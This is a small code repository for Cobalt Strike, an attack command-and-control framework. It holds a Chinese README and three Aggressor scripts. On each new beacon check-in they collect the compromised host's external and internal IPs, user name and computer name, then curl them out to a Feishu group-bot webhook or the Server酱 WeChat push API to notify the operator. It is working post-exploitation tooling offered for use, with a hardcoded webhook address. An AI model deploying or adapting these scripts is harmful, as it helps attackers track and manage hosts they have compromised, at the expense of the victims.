├── README.md
├── http_feishu.cna
├── http_feishu_wechat.cna
└── http_wechatServerChains.cna


/README.md:
--------------------------------------------------------------------------------
 1 | # Cobalt_Strike_Bot
 2 | CobaltStrike 上线通知，飞书群聊机器人通知
 3 | 
 4 | ## 飞书群聊机器人
 5 | 在飞书中新建一个群聊，在群聊中添加一个群聊机器人。将其webhook地址复制，替换掉`$feishu_url`中的webhook地址
 6 | ```bash
 7 | $feishu_url = 'https://open.feishu.cn/open-apis/bot/v2/hook/092e2219-726f-4202-876a-cc6ac8641490';
 8 | ```
 9 | 
10 | <center>
11 | <img width="735" alt="image" src="https://user-images.githubusercontent.com/21257485/172523390-4bad37c6-7a31-4fe4-b2fe-a7bb5194cffc.png">
12 | </center>
13 | 
14 | ## 服务端部署
15 | 
16 | 此脚本依赖`curl`命令，请确保cs服务端已安装了`curl`
17 | ```bash
18 | ./agscript [IP] [PORT] [UserName] [PassWord] [cna_file_Path]
19 | ```
20 | ## 效果图
21 | 
22 | <img src="https://user-images.githubusercontent.com/21257485/172524624-fe29121b-eb5b-48b9-a902-06f56e6a53ed.png" width="250" ><img src="https://user-images.githubusercontent.com/21257485/172755780-99c48e8b-4133-4c4c-9b8e-578fc921cc8f.png" width="250"><img src="https://user-images.githubusercontent.com/21257485/172755761-0935e9dd-e07b-47f8-ad11-f34824b63eb7.png" width="250" >
23 | 
24 | 
25 | 


--------------------------------------------------------------------------------
/http_feishu.cna:
--------------------------------------------------------------------------------
 1 | on beacon_initial {
 2 |     # 飞书群聊机器人 webhook 地址
 3 |     $feishu_url = 'https://open.feishu.cn/open-apis/bot/v2/hook/092e2219-726f-4202-876a-cc6ac8641490';
 4 |     
 5 |     #获取ip、计算机名、登录账号
 6 |     $externalIP = replace(beacon_info($1, "external"), " ", "_");
 7 |     $internalIP = replace(beacon_info($1, "internal"), " ", "_");
 8 |     $userName = replace(beacon_info($1, "user"), " ", "_");
 9 |     $computerName = replace(beacon_info($1, "computer"), " ", "_");
10 | 
11 |     # json格式的消息体
12 |     $json_start = "{\"msg_type\":\"text\",\"content\":{\"text\": ";
13 |     $json_msg = '"Cobalt Strike上线提醒\nexternal: '.$externalIP.'\ninternal: '.$internalIP.'\n用户名: '.$userName.'\n计算机名: '.$computerName.'\n"';
14 |     $json_end = "}}";
15 |     $msg = $json_start.$json_msg.$json_end;
16 | 
17 |     # 调用飞书API
18 |     @curl_command = @('curl','-X','POST','-H','Content-Type: application/json','-d',$msg,$feishu_url);
19 |     exec(@curl_command);
20 | }


--------------------------------------------------------------------------------
/http_feishu_wechat.cna:
--------------------------------------------------------------------------------
 1 | on beacon_initial {
 2 |     # 飞书群聊机器人 webhook 地址
 3 |     $feishu_url = '把这里替换为飞书webhook的地址';
 4 |     # server酱 API地址
 5 |     $serverchains_api = 'https://sctapi.ftqq.com/把这里替换为server酱的SendKey.send';
 6 |     
 7 |     #获取ip、计算机名、登录账号
 8 |     $externalIP = replace(beacon_info($1, "external"), " ", "_");
 9 |     $internalIP = replace(beacon_info($1, "internal"), " ", "_");
10 |     $userName = replace(beacon_info($1, "user"), " ", "_");
11 |     $computerName = replace(beacon_info($1, "computer"), " ", "_");
12 | 
13 |     # 飞书 
14 |     $json_start = "{\"msg_type\":\"text\",\"content\":{\"text\": ";
15 |     $json_msg = '"Cobalt Strike上线提醒\n出口IP: '.$externalIP.'\n内网IP: '.$internalIP.'\n用户名: '.$userName.'\n计算机名: '.$computerName.'\n"';
16 |     $json_end = "}}";
17 |     $msg = $json_start.$json_msg.$json_end;
18 |     # 通过curl调用飞书API
19 |     @curl_command = @('curl','-X','POST','-H','Content-Type: application/json','-d',$msg,$feishu_url);
20 |     exec(@curl_command);
21 | 
22 |     # server酱
23 |     $serverchains_msg = 'title=Cobalt Strike上线通知&desp='.'%0d%0a%0d%0a出口IP: '.$externalIP.'%0d%0a%0d%0a内网IP: '.$internalIP.'%0d%0a%0d%0a用户名: '.$userName.'%0d%0a%0d%0a计算机名: '.$computerName;
24 |     # 通过curl调用server酱 API
25 |     @curl_command_wechat = @('curl','-X','POST','-d',$serverchains_msg,$serverchains_api);
26 |     exec(@curl_command_wechat);
27 | }
28 | 


--------------------------------------------------------------------------------
/http_wechatServerChains.cna:
--------------------------------------------------------------------------------
 1 | on beacon_initial {
 2 |     # server酱 API地址
 3 |     $serverchains_api = 'https://sctapi.ftqq.com/在这里替换server酱的SendKey.send';
 4 | 
 5 |     #获取ip、计算机名、登录账号
 6 |     $externalIP = replace(beacon_info($1, "external"), " ", "_");
 7 |     $internalIP = replace(beacon_info($1, "internal"), " ", "_");
 8 |     $userName = replace(beacon_info($1, "user"), " ", "_");
 9 |     $computerName = replace(beacon_info($1, "computer"), " ", "_");
10 | 
11 |     # server酱
12 |     $serverchains_msg = 'title=Cobalt Strike上线通知&desp='.'%0d%0a%0d%0a出口IP: '.$externalIP.'%0d%0a%0d%0a内网IP: '.$internalIP.'%0d%0a%0d%0a用户名: '.$userName.'%0d%0a%0d%0a计算机名: '.$computerName;
13 |     # 通过curl调用server酱 API
14 |     @curl_command_wechat = @('curl','-X','POST','-d',$serverchains_msg,$serverchains_api);
15 |     exec(@curl_command_wechat);
16 | }
17 | 


--------------------------------------------------------------------------------